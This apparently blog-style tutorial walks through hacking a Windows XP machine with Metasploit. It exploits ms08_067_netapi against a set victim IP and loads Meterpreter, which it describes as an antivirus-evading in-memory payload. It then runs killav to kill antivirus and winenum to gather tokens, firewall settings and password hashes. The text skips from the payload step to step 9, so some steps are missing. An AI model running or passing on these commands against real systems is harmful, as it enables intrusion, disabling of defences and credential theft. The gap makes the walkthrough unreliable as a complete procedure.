What is meterpreter? Meterpreter is payload that uses DLL injection technique in memory so, antiviruses software can’t detect it because meterpreter writes nothing to disk, meterpreter uses encrypted communications.
Now let’s try to hack windows machine (Windows XP) and set Meterpreter as a payload, first we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi
Then we set the remote host (victim)
set RHOST 192.168.0.227
Then we set meterpreter as a payload
9- checkvm To check if the remote system is a Vitrual machine
run checkvm
The target system is actually a virtual machine ruuning on VMware
10- killav To kill antivirus
run killav
11- windows enumration: Collecting all information about the target machine such as (username, running process, tokens, network information, hardware information, groups, network route, firewall configuration, hash passwords,etc…)
run winenum
As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK, to view the tokens